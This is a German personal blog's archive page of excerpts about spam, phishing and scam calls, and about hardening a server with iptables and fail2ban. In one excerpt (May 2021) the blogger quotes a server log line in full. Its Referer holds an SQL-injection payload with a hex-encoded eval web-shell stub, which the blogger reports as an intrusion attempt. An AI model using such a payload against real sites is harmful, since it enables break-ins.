Archiv der Rubrik 'Spam'
Webmaster-Spam auf neuem Level
Freitag, 24. März 2023
Eine nette Dame meinte, mich heute nochmal dran erinnern zu müssen, daß ich ihre Mail vom 16. März nicht beantwortet hätte. Naja, das hat ja vielleicht Gründe? Schauen wir mal:
Am 24.03.23 um 16:32 schrieb Julia Noack:
Liebes atari-frosch.de -Team,
1. Fehler: Impressum nicht gelesen. atari-frosch.de hat kein Team. Das ist meine private Site. Ja, auch das Blog und weitere Webdienste unter weiteren Subdomains. Spammer lesen praktisch nie das Impressum, oder wenn, dann nur, um eine Mailadresse abzugreifen, die man bespammen kann. Gern auch automatisiert. (mehr …)
Angriffsversuch per Referer
Sonntag, 2. Mai 2021
Eben in einer Meldung von fail2ban gesehen:
114.219.10.161 - - [02/May/2021:08:02:47 +0200] "POST /user.php HTTP/1.1" 404 47 "45ea207d7a2b68c49582d2d22adf953aads|a:3:{s:3:\x22num\x22;s:191:\x22*/ select 1,0x2720756e696f6e2f2a,3,4,5,6,7,8,0x7B24617364275D3B6576616C2F2A2A2F286261736536345F6465636F646528275A585A686243676B583142505531526259575274615735644B54733D2729293B2F2F7D787878,0--\x22;s:2:\x22id\x22;s:9:\x22' union/*\x22;s:4:\x22name\x22;s:3:\x22ads\x22;}45ea207d7a2b68c49582d2d22adf953a" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
Ohne Recherche: Das sieht erstmal … seltsam aus. Vermutlich müßte man die Hex-Zahlenreihen aufdröseln, um zu erfahren, was er wirklich wollte. Die lesbaren Strings „select“ und „union“ deuten aber auf einen SQL-Angriff hin. Nur: Warum steht der im Referer? Was würde denn darauf anspringen? (mehr …)
Spaß mit iptables
Donnerstag, 10. September 2020
Mit iptables kann man auf einem Linux-System festlegen, welche IP bzw. welche IP-Bereiche auf welche Ports bzw. überhaupt auf einen Host zugreifen dürfen. Nun hatte ich vor einiger Zeit festgestellt, daß es sozusagen Port-Sucher gibt, die – schön langsam, damit sie unterm Radar bleiben – nach und nach alles an denkbaren Ports an einem Host abklappern, um zu gucken, ob da vielleicht ein sshd läuft. Denn mittlerweile legt man den sshd nicht auf den üblichen Port 22, sondern auf einen anderen, meist einen so genannten hohen Port (> 1024).
Wenn diese Port-Sucher fündig werden, schicken sie eine ganze Ladung anderer Hosts los, um diesen sshd zu, ähm, belästigen. Das fand ich etwas störend, also wollte ich etwas dagegen unternehmen.
Zu diesem Zweck definierte ich eine Regel, die den Zugang auf den Port des sshd auf ein paar wenige IP-Adressen einschränkt. Auf diesen Server hier kommen seitdem nur noch die Hosts, auf denen ich selbst wiederum einen Shell-Zugang habe, und eben die IP, die mir mein ISP hier zu Hause zugewiesen hat. Praktischerweise schien die letztgenannte IP quasi-fest zu sein; ich meine, die hat sich seit zwei Jahren oder so nicht mehr geändert.
Von Montag auf Dienstag änderte sie sich nun doch. Und damit fing der Spaß an. (mehr …)
Joe Job via Piwigo-Plugin?
Donnerstag, 14. Mai 2020
Es gibt Netzmißbrauch-Varianten, die muß man echt nicht verstehen. Seit etwa zwei Wochen beobachte ich mindestens 40 Einträge pro Tag auf meiner Piwigo-Instanz über das Plugin Subscribe-to-Comments. Das hat dieselbe Funktion wie das gleichnamige Plugin für WordPress/ClassicPress, mit dem Unterschied, daß es nicht konfigurierbar ist: Man kann sich damit von der Site Mails schicken lassen, wenn zu einem bestimmten Beitrag bzw. Foto ein neuer Kommentar eingegangen ist – auch wenn man selbst nicht kommentiert hat.
Das betreffende Foto – und ja, es war immer dasselbe – hat bisher keine Kommentare bekommen und zeigt auch generell nichts Besonderes. Die verwendeten Mailadressen stammen offensichtlich von amerikanischen Mailhostern. Eingeliefert werden die Subscriptions, soweit ich das gesehen habe, ausschließlich über Tor-Exit-Nodes. Die Mailadressen, die dabei angegeben werden, existieren teilweise nicht einmal; ich hatte deshalb pro Tag etliche Bounces. Heute wurde mir dann klar, daß auch die Inhaber der existierenden Adressen nichts davon wußten: Ich bekam nämlich eine Spam-Beschwerde. (mehr …)
Wordfence to fail2ban
Freitag, 1. November 2019
Das WordPress-Plugin Wordfence ist ein weit verbreitetes Sicherheits-Plugin, um WordPress und auch dessen Clone ClassicPress vor unerwünschten Zugriffen zu schützen. Leider hat es einen Nachteil: Es kann Zugriffe nur auf Webserver-Ebene blockieren. Das heißt, auch intensive Einbruchsversuche, aggressives Crawling, oder sogar Versuche, angreifbare Plugins oder Themes etc. zu finden, hämmern trotzdem unter Umständen stunden- bis tagelang auf den Webserver ein. Und diese Angreifer können wirklich sehr aggressiv und ausdauernd sein.
Man könnte nun nach einer Mail von Wordfence, daß da mal wieder ein Host keine Ruhe gibt, diesen Host in die Firewall eintackern. Diese Einträge müßte man dann aber ständig nachhalten, denn irgendwann hören die Angriffe von einem bestimmten Host ja auch mal wieder auf, und die Firewall-Einträge möchte man ja eher knapp halten, damit die Überprüfung bei jedem Zugriff von außen nicht zu lange dauert. (mehr …)
Trojaner-Versand nach geknacktem Account
Montag, 16. September 2019
Richtig gelesen: „nach“, nicht „mit“.
Ich bekam heute Vormittag eine E-Mail, die scheinbar von einer Firma kam, mit der ich bis vor ein paar Monaten gelegentlich in Kontakt stand. Scheinbar, weil die Absender-Adresse nicht dazu paßte. Die Firma hat eine eigene Domain mitsamt MX, verschickt also normalerweise auch E-Mails unter dieser eigenen Domain. Aber die Absender-Adresse dieser E-Mail war eine völlig andere.
In dieser E-Mail wurde eine E-Mail von mir an die Firma zitiert, ein typischer Vollquote, darüber stand ohne Anrede „wie besprochen, in der Anlage die angeforderte [sic!] Informationen.“ Allerdings hatte ich diese E-Mail bereits Mitte Januar geschrieben gehabt; es war die letzte Mail, die ich dorthin geschickt hatte (und die war damals auch beantwortet worden). (mehr …)
Datensammlung getarnt als Wohltätigkeit
Freitag, 29. September 2017
Die Ing-Diba, eine Bank, veranstaltet derzeit einen Wettbewerb. Man soll dort für „seinen“ Verein stimmen, und der Verein, der am meisten Stimmen bekommt, bekommt von der Bank dann ein (für die Verhältnisse der Bank) kleines Taschengeld. Das klingt nach Wohltätigkeit, ist es aber nicht. Tatsächlich handelt es sich um eine für die Bank sehr billige Marketing- und Datensammel-Aktion. Das Ziel: bekannter werden und aktuelle Handy-Nummern einsammeln.
Denn wer dort für „seinen“ Verein abstimmen will, wird erstmal dazu aufgefordert, seine Handy-Nummer anzugeben, angeblich zu dem Zweck, mithilfe einer SMS sicherzustellen, daß jeder nur einmal abstimmen kann: (mehr …)
EOS SAF und der Telefonterror
Dienstag, 7. März 2017
Im Jahr 2002 haben sich bei mir durch das Verhalten des faschistischen Repressionsamtes (AKA „Sozialamt“) einige Schulden angesammelt. Wie das halt so passiert, wenn eine Behörde, die eigentlich Geld auszahlen sollte, einfach ignoriert, daß der Antragsteller schwer krank und handlungsunfähig ist, und dafür lieber einen Teil der immer wieder eingereichten Unterlagen im 2- bis 3-Wochen-Rhythmus in den Schredder kippt und dann noch dreist lügt.
Eine dieser Forderungen war die der Telekom für meinen damaligen einfachen Analoganschluß in der alten Wohnung. Die Telekom holte sich gleich einen vollstreckbaren Titel (der 30 Jahre lang gilt, während die Straftaten des Repressionsamtes ja nach drei Jahren verjährten, während ich noch handlungsunfähig war). Das Repressionsamt wurde nicht gesamtschuldnerisch mit verklagt, wieso auch, ich bin ja schließlich selbst schuld, wenn ich mir den Luxus eines Telefonanschlusses gönne.
Von Anfang an bekam ich daher immer wieder Briefe von der Anwaltskanzlei Seiler in Heidelberg, der Hauskanzlei der Telekom für Inkasso. Seiler und Coll. nervten mich so lange, bis ich im Juni 2007 deutlich wurde: (mehr …)
Loggen, was iptables wegwirft
Sonntag, 4. Dezember 2016
Um meine Server gegen diverse Arten von Angriffen abzusichern, habe ich fail2ban installiert und mir eine Reihe von Filtern angepaßt oder selbst neu gebaut. Anhand der Filter meldet fail2ban an iptables, welche IPs wie lange gesperrt werden sollen. Das funktioniert soweit ganz gut.
Trotzdem gibt es eine Reihe von IP-Adressen und -Ranges, die man eigentlich nicht fail2ban überlassen muß. Denn sie werden immer und immer wieder in den Filtern landen und immer und immer wieder erneut gebannt werden müssen. Von diesen IPs und -Ranges kommen nämlich ausschließlich Spamkommentare, aggressives Crawling auf Websites, Suchen nach ausnutzbaren Schwachstellen, Einbruchsversuche in Blogs, auf der Shell und in weitere Dienste sowie Spam-Mails. Also will man sie grundsätzlich blocken. Ist mit iptables auch nicht schwer. Aber … (mehr …)
Wahlkampf
Montag, 19. Mai 2014
Mal ein paar Gedanken zum Thema Wahlkampf, nicht nur den derzeitigen für EU- und Kommunalwahlen, sondern so generell …
Findet Ihr das eigentlich gut, was die Parteien da machen? Da werden teils Riesen-Beträge ausgegeben, um Plakate zu gestalten und aufzuhängen, um Wahlwerbespots zu drehen und von Fernsehsendern und Kinos ausstrahlen zu lassen und Anzeigen in Zeitungen schalten zu lassen. Es werden Flyer erstellt, gedruckt und verteilt, manchmal kommen auch noch typische Werbegeschenke wie Kugelschreiber, Schreibblöcke, Blumen, Lutscher, Luftballons etc. dazu. Aber mal ehrlich: Was hat das alles mit einer politischen Wahl zu tun? (mehr …)
Spammer-Blödheit (Jooble)
Freitag, 16. Mai 2014
Manchmal versuchen Spammer ja, besonders intelligent zu spammen. Also statt in schlechtem Englisch oder sogar gebabelfishtem Deutsch irgendwelche Medikamente, Modeartikel oder Versicherungen zu verkaufen oder Zugangsdaten abzuphishen, tun sie so, als ob sie einen wirklich persönlich ansprechen wollten.
Allerdings tun sie auch wirklich nur so. (mehr …)
Werbeartikel im Blog
Montag, 31. März 2014
Kürzlich kam mal wieder so eine E-Mail, in welcher mir „editorial content“ für mein Blog „angeboten“ wurde. Ein nicht als Werbung markierter Artikel, der irgendeine nicht genannte Firma über den grünen Klee loben und „genau im Ton und Duktus Ihres Blogs“ geschrieben sein sollte. Ja ne is klar. Leute, meinen Ton trefft Ihr eh nicht. 😉
In diesem Fall besaß die anfragende Marketing-Firma sogar die Frechheit, nochmal „höflich nachzufragen“, ob ich mir das tolle Angebot denn mal überlegt hätte. Um das hier mal klarzustellen: Nein. Ich überlege nicht, mit Spammern ins Geschäft zu kommen. Also: So richtig gar nicht. (mehr …)
Scareware am Telefon
Freitag, 22. März 2013
Heute Mittag gegen 12:00 Uhr hatte ich einen, ähm, interessanten Anruf. Der Mensch sprach ein stark akzentbehaftetes Englisch, ich verstand nicht alles. Aber so viel: Er sei von „Microsoft”, wenn ich meinen „computer connect to the internet”, dann würde der „download something”, und das macht dann einen „system crash”. Nachdem er sein Sprüchlein noch zweimal wiederholt hatte, verstand ich so viel, daß er mich wohl davor warnen wollte, meinen Computer mit dem Internet zu verbinden, weil der dann sofort was runterladen würde, was „mein Windows” zum Absturz brächte. Aha, soso. (mehr …)
(K)eine Einladung von Facebook
Donnerstag, 30. August 2012
Beim ersten Durchsehen der E-Mails für heute fiel mir eine Einladung zu Facebook auf. Solche Einladungen sind ja leider Mode geworden: Leute auf Xing, LinkedIn und auch Facebook laden einfach mal ihr ganzes Adreßbuch hoch und lassen die Plattformen dann an alle darin enthaltenen Adressen Einladungen verschicken. Allerdings sind nicht alle Einladungen, die scheinbar von diesen Netzwerken kommen, tatsächlich von dort.
An dieser Einladung fiel mir als erstes auf, daß weder mein Name erwähnt wurde noch der desjenigen, der mich angeblich einladen will. Und als nächstes, daß die Mail einen ZIP-gepackten Anhang hat. Also hab ich mal genauer hingesehen: (mehr …)
Ohne Javascript keine Inhalte
Samstag, 18. Februar 2012
Mir fällt das immer öfter auf: Websites sind so gestaltet, daß man keine Inhalte sieht, wenn JavaScript ausgeschaltet ist. Eben gerade hatte ich das wieder: Vera hatte in einem Google+-Beitrag auf einen Artikel bei Gawker verlinkt. Den wollte ich mir ansehen, und bekam das hier: (mehr …)